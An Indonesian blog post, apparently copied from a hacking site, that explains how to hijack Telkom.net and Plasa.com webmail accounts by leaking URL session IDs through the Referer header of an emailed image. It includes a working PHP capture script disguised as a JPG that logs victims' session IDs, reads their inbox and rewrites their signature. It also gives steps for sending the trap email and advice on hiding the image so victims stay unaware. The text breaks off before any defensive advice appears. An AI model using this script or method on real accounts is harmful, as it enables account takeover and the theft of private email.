Blognya PakRud::..
...Sampaikan Walaupun Hanya Satu Ayat....
 Monday, 20 May 2024, 7:02 AM


Welcome Guest | RSS


Main | Registration | Login
Login form
Menu Utama
Kategori
Media Islam [8]
Fisika Mania [7]
OS & Office [6]
Internet & Networking [4]
Programming [2]
Hacking [5]
Design [2]
Upgrade Knowledge [17]
Hikmah & Motivasi [6]
Arsip
Mini Chat
Main » 2009 » November » 11 » Hacking Email Telkom.net dan Plasa.com
7:49 PM
Hacking Email Telkom.net dan Plasa.com

Telkom.net dan Plasa.com adalah fasilitas email gratis yang diberikan oleh PT Telkom. Pengguna email telkomnet dan plasacom patut waswas, karena amat mudah untuk menghack email di sana. Hanya dengan membuka sebuah email yang telah dirancang khusus oleh attacker, email anda bisa menjadi milik attacker. Dalam artikel ini saya akan tunjukkan apa kelemahannya, bagaimana cara mengexploitasi kelemahan itu dan tentu saja bagaimana cara agar terhindar dari serangan itu.

Webmail Session Hijacking

Teknik hacking email dalam artikel ini adalah dengan cara hijacking session. Oleh karena itu teknik ini hanya bisa dilakukan pada webmail telkom.net dan plasa.com, pengguna telkom.net dan plasa.com yang menggunakan Outlook/Thunderbird tidak rentan terhadap serangan ini.

Karena http adalah protokol yang stateless, sedangkan untuk membuat session server harus bisa memantau state user, maka digunakanlah session ID sebagai kunci atau penanda suatu session. Bila sessionID diketahui attacker, maka attacker bisa menguasai session korban. Orang lain, siapapun yang membawa sessionID anda, akan dianggap oleh server sebagai anda. Hijacking session adalah usaha untuk mendapatkan session ID korban, dengan cara predicting, capturing, atau fixating session ID.

SessionID diberikan oleh server dan harus dikembalikan lagi oleh browser (client) setiap kali membuat request. Mekanisme penyimpanan dan pengiriman session ID bisa dilakukan dengan dua cara:

  1. Session Cookie: Session ID diberikan server dalam bentuk cookie dan disimpan oleh browser. Setiap browser melakukan request, cookie tersebut akan dikembalikan ke server lagi sebagai bukti bahwa user tersebut adalah masih orang yang sama.
  2. URL Rewriting: Server menyisipkan session ID dalam halaman html yang dikirimkan ke browser. Session ID tersebut dimasukkan dalam bentuk URL di tag html tertentu seperti link (tag A). Contohnya bila URL link aslinya adalah http://www.somesite.com/inbox.php Oleh server link tersebut akan disisipkan sessionID menjadi: 
    <A href="http://www.somesite.com/inbox.php?PHPSESSID=xxxxxxxxx">INBOX</A>

    Dengan cara ini setiap kali user mengklik link tersebut, maka sessionID juga akan dikirim ke server sebagai bukti bahwa user tersebut adalah pengguna session yang sah.

SessionID paling aman disimpan dan dikirim kembali ke server dalam bentuk cookie, apalagi bila cookie tersebut diamankan dengan bit secure atau httponly (baca: protecting cookie with httponly ). Kemungkinan serangan yang bisa dilancarkan untuk mencuri cookie adalah dengan XSS attack dan sniffing attack, kedua jenis serangan itu bisa dicegah dengan bit secure dan httponly.

Bila cookie telah diamankan dengan secure bit, maka cookie tersebut tidak bisa dicuri dengan sniffing karena cookie hanya dikirim melalui https, cookie tersebut juga tidak bisa dicuri dengan serangan XSS karena akses javascript terhadap cookie telah ditutup. Bila cookie hanya dilindungi dengan httponly, maka cookie itu aman dari serangan XSS, namun rentan sniffing bila cookie dikirimkan melalui http biasa.

Berbeda dengan cookie, menyimpan Session ID dalam URL sangatlah berbahaya, karena URL mudah dilihat, dikopi dan disimpan dalam bookmark, log file dan sebagainya. Selain itu sessionID juga bisa bocor ke tempat lain melalui header Referer. Sebab header Referer bertugas membawa URL dimana sebuah request dilakukan. Bila dalam suatu halaman terjadi request untuk mengambil gambar, maka header Referer akan mengandung URL dari halaman tersebut. Dalam artikel ini saya akan menggunakan jurus header Referer untuk membajak session webmail Telkom.net dan Plasa.com. Bagi pemilik situs, tentu sering melihat header ini dengan program statistic seperti Awstats untuk melihat pengunjung situs berasal dari situs mana saja.

telkom.net URL

telkom.net URL


plasa.com URL

plasa.com URL

SessionID webmail Telkom.net dan Plasa.com disimpan pada URL sehingga memudahkan pembajakan session. Mari kita lihat bagaimana bentuk URL webmail telkom.net dan plasa.com: 

http://mail.telkom.net/Session/206017-7vY8EVuJF2935NV9Fhzl-kmbcuww/mailbox.wssp?Mailbox=INBOX&amp;
http://mail1.plasa.com/Session/70174-k2O8e3vcnJEFxmxWYpOX-kmbcuwc/mailbox.wssp?Mailbox=INBOX&amp;

Stealing SessionID from Referer Header

Session ID pada URL telkom.net dan plasa.com disisipkan setelah /Session/ hingga karakter / (slash). Sekarang bagaimana caranya attacker bisa mengetahui URL yang sedang dibuka korban di browsernya? Di awal saya sudah menyebutkan sekilas tentang header request yang bernama Referer. Tugas dari header ini adalah mengirimkan URL halaman yang melakukan request. Agar lebih jelasnya mari kita lihat sebuah contoh.

Ketika pengunjung sedang membuka halaman dengan URL: 

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/Mailbox.wssp?Mailbox=INBOX

Kemudian ketika terjadi request ke sebuah file image: 

http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif

Maka pada request GET tersebut akan ada header seperti di bawah ini: 

1
2
3
4
5
6
7
8
9
10
11
GET /Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif HTTP/1.1
Host: mail.telkom.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 GTB5 ImageShackToolbar/5.0.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/mailbox.wssp?Mailbox=INBOX&
Cache-Control: max-age=0

Pada baris ke-10 terdapat header Referer yang menunjukkan bahwa request tersebut terjadi ketika kepada user sedang berada di URL tersebut. Karena URL yang direquest adalah http://mail.telkom.net/Session/235581-9w3zNaNskYc1v7ln5DDJ-kmbcuww/batal.gif, maka web server mail.telkom.net tempat file batal.gif tersebut berada, dapat mengetahui URL ketika request tersebut terjadi. Sekarang bayangkan apa yang terjadi bila request tersebut bukan mendownload image dari mail.telkom.net, tapi dari server www.evilhackersite.com/image.jpg. Web server di www.evilhackersite.com tentu akan mendapatkan URL tempat terjadinya request dari header Referer. Dan karena URL tersebut mengandung Session ID, maka dengan mudah attacker akan membajak session anda.

Attack Scenario

Webmail telkom.net dan plasa.com menggunakan URL sebagai mekanisme pertukaran session ID. Attacker bisa menjebak korban untuk membuka sebuah email yang mengandung gambar yang berlokasi di server attacker. Tag IMG tersebut akan membuat browser korban melakukan request ke server attacker, dengan tentu saja mengirimkan URL korban dalam header Referer. Dengan mengetahui session ID korban, attacker dengan mudah menguasai account webmail korban.

Preparing the Script

Sebelum bisa melakukan serangan, yang pertama harus dilakukan adalah menyiapkan server side script sebagai target request untuk menangkap SessionID korban. Server side script ini akan di-”masking” sebagai file JPG dengan menggunakan mod_rewrite Apache (.htaccess). Server side script yang dimasking sebagai file JPG inilah yang akan dimasukkan dalam tag IMG dalam email yang dibaca korban. Bila korban membaca email attacker, maka akan terjadi request ke server side script itu, sehingga attacker bisa mendapatkan session ID korban dan menguasai emailnya.

URL yang akan kita jadikan tujuan request adalah: http://www.ilmuhacking.com/mylab/image.jpg yang sebenarnya adalah masking untuk server side script http://www.ilmuhacking.com/mylab/checkmail.php. Dengan menggunakan mod_rewrite Apache dan settings .htacess berikut ini masking checkmail.php menjadi image.jpg bisa dilakukan: 

1
2
3
RewriteEngine On
RewriteBase /
RewriteRule mylab/image.jpg mylab/checkmail.php

Berikutnya saya harus menyiapkan file checkmail.php. Tugas dari script php itu adalah mendapatkan session ID kemudian langsung membajak session korban bermodalkan session ID tersebut. 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88

// Ambil header Referer
$ref = $_SERVER["HTTP_REFERER"];
$telkomnet = false;
$plasacom = false;
$width = 468;
$height = 100;
if (strpos($ref,"telkom.net")>-1) {
 $telkomnet = true;
}
if (strpos($ref,"plasa.com")>-1) {
 $plasacom = true;
}
if ($telkomnet===false && $plasacom===false) {
 exit();
}
 
$file = fopen("daftarkorban.txt","a");
$url_tokens = parse_url($ref);
$host = $url_tokens["host"];
$tokens = explode("/",$ref);
$sessid = $tokens[4];
fwrite($file,"######\n");
fwrite($file,"REFERER:".$_SERVER["HTTP_REFERER"]."\n");
fwrite($file,"SESSID:".$sessid."\n");
 
$urlhost = "http://$host/Session/$sessid/mailbox.wssp?Mailbox=INBOX&";
$inboxhtml = file_get_contents($urlhost);
 
preg_match('/(.*?)<\/title>/i'</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$inboxhtml</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$matches</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$title</span><span style="color: rgb(51, 153, 51);">=</span><span style="color: rgb(0, 0, 136);">$matches</span><span style="color: rgb(0, 153, 0);">[</span><span style="color: rgb(204, 102, 204);">1</span><span style="color: rgb(0, 153, 0);">]</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$email</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 136);">$title</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$pos</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">strpos</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$title</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 255);">" "</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(177, 177, 0);">if</span> <span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$pos</span> <span style="color: rgb(51, 153, 51);">></span> <span style="color: rgb(51, 153, 51);">-</span><span style="color: rgb(204, 102, 204);">1</span><span style="color: rgb(0, 153, 0);">)</span> <span style="color: rgb(0, 153, 0);">{</span><br><span style="color: rgb(0, 0, 136);">$email</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">substr</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$title</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(204, 102, 204);">0</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 136);">$pos</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 153, 0);">}</span><br> <br><span style="color: rgb(153, 0, 0);">fwrite</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$file</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 255);">"KORBAN:"</span><span style="color: rgb(51, 153, 51);">.</span><span style="color: rgb(0, 0, 136);">$email</span><span style="color: rgb(51, 153, 51);">.</span><span style="color: rgb(0, 0, 255);">"<span style="color: rgb(0, 0, 153); font-weight: bold;">\n</span>"</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">fwrite</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$file</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 255);">"******<span style="color: rgb(0, 0, 153); font-weight: bold;">\n</span>"</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">fclose</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$file</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <br><span style="color: rgb(0, 0, 136);">$image</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">ImageCreate</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$width</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$height</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$white</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">ImageColorAllocate</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">255</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">255</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">255</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$black</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">ImageColorAllocate</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">0</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">0</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">0</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$grey</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">ImageColorAllocate</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">204</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">204</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">204</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">ImageFill</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">0</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">0</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$black</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">ImageString</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">3</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">15</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">5</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$sessid</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$white</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">ImageString</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">3</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">25</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">25</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$email</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$white</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <br><span style="color: rgb(102, 102, 102); font-style: italic;">// Writing Signature...</span><br><span style="color: rgb(0, 0, 136);">$url</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 255);">"http://mail.telkom.net/Session/<span style="color: rgb(0, 102, 153); font-weight: bold;">$sessid</span>/settings.wssp"</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(177, 177, 0);">if</span> <span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$plasacom</span><span style="color: rgb(51, 153, 51);">==</span><span style="color: rgb(0, 153, 0); font-weight: bold;">true</span><span style="color: rgb(0, 153, 0);">)</span> <span style="color: rgb(0, 153, 0);">{</span><br> <span style="color: rgb(0, 0, 136);">$url</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 255);">"http://mail1.plasa.com/Session/<span style="color: rgb(0, 102, 153); font-weight: bold;">$sessid</span>/settings1.wssp"</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 153, 0);">}</span><br><span style="color: rgb(0, 0, 136);">$old_settings</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">file_get_contents</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$url</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">preg_match</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 255);">'/<textarea(.*?)>(.*?)<\/textarea>/i'</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$old_settings</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$matches</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$oldsig</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 136);">$matches</span><span style="color: rgb(0, 153, 0);">[</span><span style="color: rgb(204, 102, 204);">2</span><span style="color: rgb(0, 153, 0);">]</span><span style="color: rgb(51, 153, 51);">;</span><br> <br><span style="color: rgb(0, 0, 136);">$data</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">array</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$data</span><span style="color: rgb(0, 153, 0);">[</span><span style="color: rgb(0, 0, 255);">"UserFrom"</span><span style="color: rgb(0, 153, 0);">]</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 136);">$email</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$newsig</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 255);">"[YOUR EMAIL HAS BEEN HACKED]"</span><span style="color: rgb(51, 153, 51);">.</span><span style="color: rgb(0, 0, 136);">$oldsig</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$data</span><span style="color: rgb(0, 153, 0);">[</span><span style="color: rgb(0, 0, 255);">"Signature"</span><span style="color: rgb(0, 153, 0);">]</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 136);">$newsig</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 0, 136);">$data</span><span style="color: rgb(0, 153, 0);">[</span><span style="color: rgb(0, 0, 255);">"Update"</span><span style="color: rgb(0, 153, 0);">]</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(0, 0, 255);">"Update"</span><span style="color: rgb(51, 153, 51);">;</span><br> <br><span style="color: rgb(0, 0, 136);">$response</span> <span style="color: rgb(51, 153, 51);">=</span> doPost<span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$url</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 136);">$data</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(177, 177, 0);">if</span> <span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(153, 0, 0);">strpos</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$response</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 255);">"Updated"</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">>-</span><span style="color: rgb(204, 102, 204);">1</span> <span style="color: rgb(51, 153, 51);">&&</span> <span style="color: rgb(0, 0, 136);">$telkomnet</span><span style="color: rgb(51, 153, 51);">==</span><span style="color: rgb(0, 153, 0); font-weight: bold;">true</span><span style="color: rgb(0, 153, 0);">)</span> <span style="color: rgb(51, 153, 51);">||</span> <span style="color: rgb(0, 0, 136);">$plasacom</span><span style="color: rgb(51, 153, 51);">==</span><span style="color: rgb(0, 153, 0); font-weight: bold;">true</span><span style="color: rgb(0, 153, 0);">)</span> <span style="color: rgb(0, 153, 0);">{</span><br> <span style="color: rgb(153, 0, 0);">ImageString</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">3</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">35</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">50</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 255);">"Signature anda berhasil diganti menjadi:"</span> <span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$white</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(153, 0, 0);">ImageString</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">3</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">45</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">65</span><span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$newsig</span> <span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$white</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 153, 0);">}</span><br><span style="color: rgb(153, 0, 0);">header</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 255);">"Content-Type: image/jpeg"</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">ImageJpeg</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(153, 0, 0);">ImageDestroy</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$image</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <br><span style="color: rgb(0, 0, 0); font-weight: bold;">function</span> doPost<span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$url</span><span style="color: rgb(51, 153, 51);">,</span><span style="color: rgb(0, 0, 136);">$data</span><span style="color: rgb(0, 153, 0);">)</span> <span style="color: rgb(0, 153, 0);">{</span><br> <span style="color: rgb(0, 0, 136);">$ch</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">curl_init</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(153, 0, 0);">curl_setopt</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(51, 153, 51);">,</span> CURLOPT_URL<span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$url</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(153, 0, 0);">curl_setopt</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(51, 153, 51);">,</span> CURLOPT_RETURNTRANSFER<span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">1</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(153, 0, 0);">curl_setopt</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(51, 153, 51);">,</span> CURLOPT_POST<span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(204, 102, 204);">1</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(153, 0, 0);">curl_setopt</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(51, 153, 51);">,</span> CURLOPT_POSTFIELDS<span style="color: rgb(51, 153, 51);">,</span> <span style="color: rgb(0, 0, 136);">$data</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(0, 0, 136);">$response</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">curl_exec</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(177, 177, 0);">if</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(153, 0, 0);">curl_errno</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(0, 153, 0);">)</span><br> <span style="color: rgb(0, 153, 0);">{</span><br> <span style="color: rgb(0, 0, 136);">$response</span> <span style="color: rgb(51, 153, 51);">=</span> <span style="color: rgb(153, 0, 0);">curl_error</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(0, 153, 0);">}</span><br> <span style="color: rgb(153, 0, 0);">curl_close</span><span style="color: rgb(0, 153, 0);">(</span><span style="color: rgb(0, 0, 136);">$ch</span><span style="color: rgb(0, 153, 0);">)</span><span style="color: rgb(51, 153, 51);">;</span><br> <span style="color: rgb(177, 177, 0);">return</span> <span style="color: rgb(0, 0, 136);">$response</span><span style="color: rgb(51, 153, 51);">;</span><br><span style="color: rgb(0, 153, 0);">}</span><br><span style="color: rgb(0, 0, 0); font-weight: bold;">?></span></pre></td></tr></tbody></table></div>

<p align="justify">Cara kerja script di atas adalah: Pada baris ke-3
isi header Referer diambil. Kemudian dibuat dan dibuka file
daftarkorban.txt. File ini adalah log yang menyimpan daftar korban.
Pada baris ke-22, session ID diambil dari header referer. Setelah
session ID didapatkan kini script bisa mengubah signature korban,
dengan cara mengirimkan POST request ke
http://mail.telkom.net/Session/[SESSIONID_KORBAN]/settings.wssp,
perhatikan baris ke-65. Setelah mengubah signature korban, pada baris
ke-66 sampai baris ke-72, script membuat image dengan pesan "Signature
anda berhasil diganti menjadi:”.
</p>
<p align="justify"><b>Launch The Attack</b></p>
<p align="justify">Oke, kini semua persiapan sudah siap. Kini saatnya
kita melancarkan serangan dengan mengirimkan email html yang mengandung
tag IMG. Dalam contoh attacker adalah rizki.wicaksono@telkom.net dan
korban adalah rizki.wicaksono@plasa.com. Ingat ini hanya contoh, dalam
kenyataannya attacker bisa menggunakan email apapun, bahkan email palsu
(anonymous). Perhatikan gambar berikut ini yang menunjukan bagaimana
email yang berisi jebakan dibuat dan ditujukan untuk korban.
</p>
<div id="attachment_1328" class="wp-caption aligncenter" style="width: 254px;"><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/attackemail1.png"><img src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/attackemail1-244x300.png" alt="compose attack email" title="attackemail1" class="size-medium wp-image-1328" width="244" height="300"></a><p class="wp-caption-text">compose attack email</p></div>
<p align="justify">Dalam gambar tersebut email diisi dengan tag HTML
IMG. Perhatikan bahwa saya bisa saja membuat image tersebut invisible
dengan memberikan atribut width dan src 0. Dengan membuat image menjadi
invisible, korban tidak akan menyadari bahwa emailnya telah dibajak.
Tapi untuk contoh saya membiarkan gambar berukuran besar. Berikut ini
adalah isi tanda tangan (signature) email korban sebelum email dibuka.
</p>
<p><a href="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature1.png"><img src="http://www.ilmuhacking.com/wp-content/uploads/2009/04/signature1-300x144.png" alt="signature1" title="signature1" class="aligncenter size-medium wp-image-1330" width="300" height="144"></a></p>
<p align="justify">
Dan gambar berikut adalah gambar ketika email attacker tiba.</p>
